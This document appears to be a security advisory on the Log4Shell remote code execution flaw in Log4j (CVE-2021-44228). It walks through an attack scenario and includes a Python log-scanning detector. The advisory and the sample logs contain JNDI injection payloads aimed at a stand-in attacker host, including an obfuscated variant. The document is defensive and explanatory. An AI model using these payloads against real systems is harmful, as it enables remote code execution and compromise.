Critical vulnerability in the popular Java library – Log4j
ANSWER
A group of developers within the LunaSec platform discovered a serious vulnerability in the popular Java logging library Log4j. The vulnerability, tracked as CVE-2021-44228 and known as Log4Shell, allows remote code execution. This library is one of the most widely used event-logging libraries for applications written in Java.
It should be noted that a very large number of commercial applications – from companies such as Apple, Amazon, Elastic, Steam, and Twitter – use this library, meaning the likelihood of this vulnerability posing a threat to an organisation is high. The vulnerability allows remote code execution with the privileges of the affected application, for example a web server using Log4j. Exploitation is straightforward. Growing traffic associated with scanning internet-facing services and attempts to exploit the vulnerability has also been observed.
An example attack scenario may unfold as follows:
- An application logs events using the Apache Log4j library – for instance, failed user login attempts – recording user-controlled values such as a username or email address.
- An attacker attempts to log in, supplying a malicious payload as the username, e.g.: ${jndi:ldap://sample_domain.com/a} (where sample_domain.com is a server controlled by the attacker).
- The Log4j vulnerability is triggered by the payload, and the server sends a request to sample_domain.com via the Java Naming and Directory Interface (JNDI).
- The response contains a path to a remote Java class file (e.g. http://test.sample_domain.com/Exploit.class), which is injected into the server process.
- The injected payload enables the attacker to execute arbitrary code.
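As an added example, not part of the original advisory: a small Python detector that scans application log lines for Log4j lookup syntax in a user-controlled field, reduces nested lookups the way Log4j does before the jndi lookup runs (so a plain substring match for `${jndi:` is not the whole story), and extracts the callback host for blocking and triage. The log lines and the host name sample_domain.com are constructed.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines (not from the original page): failed logins recorded with the user-controlled username.
SAMPLE_LOG = """\
2021-12-10T12:00:01Z WARN login failed user="alice" ip=203.0.113.5
2021-12-10T12:00:02Z WARN login failed user="${jndi:ldap://sample_domain.com/a}" ip=198.51.100.7
2021-12-10T12:00:03Z WARN login failed user="${${lower:j}ndi:rmi://sample_domain.com:1099/x}" ip=198.51.100.7
2021-12-10T12:00:04Z WARN login failed user="bob${env:HOME}" ip=203.0.113.9
"""

LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...} lookup
JNDI_RE = re.compile(r"jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:\s\"]+)", re.I)

def reduce_lookups(value: str) -> str:
    """Resolve nested lookups the way Log4j does before the jndi lookup runs:
    ${lower:x}/${upper:x} yield x and ${name:-default} yields default."""
    def _reduce(m):
        body = m.group(1)
        if ":-" in body:
            return body.split(":-", 1)[1]
        name, _, arg = body.partition(":")
        return arg if name.lower() in ("lower", "upper") else m.group(0)

    prev = None
    while prev != value:  # repeat until no nested lookup can be reduced further
        prev = value
        value = LOOKUP_RE.sub(_reduce, value)
    return value

def classify(line: str) -> Tuple[str, Optional[str]]:
    """Return (severity, callback host): critical for a JNDI lookup, suspicious
    for any other ${...} lookup syntax in the line, clean otherwise."""
    reduced = reduce_lookups(line)
    m = JNDI_RE.search(reduced)
    if m:
        return "critical", m.group("host")
    if LOOKUP_RE.search(reduced):
        return "suspicious", None
    return "clean", None

def scan(log_text: str) -> List[Tuple[int, str, Optional[str]]]:
    """Scan a log and return (line number, severity, host) for each hit."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        sev, host = classify(line)
        if sev != "clean":
            findings.append((n, sev, host))
    return findings
```

Hosts returned for critical hits are the servers the vulnerable application would contact, which is what an incident responder wants to block at the egress firewall and search for in proxy and DNS logs.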
It should be noted that the attack vector is not limited solely to web applications. Any application using the Apache Log4j library is potentially vulnerable if it logs user-controlled values. For example, if an application processes email headers or DNS query data using this library, that system may also be at risk.
Many vendors have already issued their own recommendations and warnings. These can be found on manufacturers’ websites, or by consulting the community-maintained list of links: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
Additional information on how attacks work and how to defend against them is also published by security-focused websites: